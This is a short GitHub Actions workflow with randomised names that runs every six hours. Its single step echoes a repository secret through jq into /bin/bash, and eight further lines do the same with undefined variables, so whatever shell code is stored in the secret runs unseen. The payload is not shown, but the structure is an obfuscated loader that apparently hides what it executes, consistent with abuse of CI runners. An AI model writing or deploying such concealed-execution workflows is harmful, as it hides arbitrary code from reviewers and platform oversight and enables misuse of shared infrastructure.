name: founderunable
on:
  workflow_dispatch:
  schedule:
    - cron: '17 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: founderunable
        env:
          kijn8: ${{ secrets.kijn8 }}
        run: |
          echo $kijn8 | jq -r .lam68784 | /bin/bash
          echo $li7408 | jq -r .btbix1313 | /bin/bash
          echo $bada307 | jq -r .nipuo61 | /bin/bash
          echo $zguxk8 | jq -r .dwg151 | /bin/bash
          echo $bv0 | jq -r .ajuv5 | /bin/bash
          echo $cgi4 | jq -r .x10126 | /bin/bash
          echo $br56 | jq -r .yqvyb592 | /bin/bash
          echo $e88642 | jq -r .qgb784 | /bin/bash
          echo $x7 | jq -r .xhq3 | /bin/bash

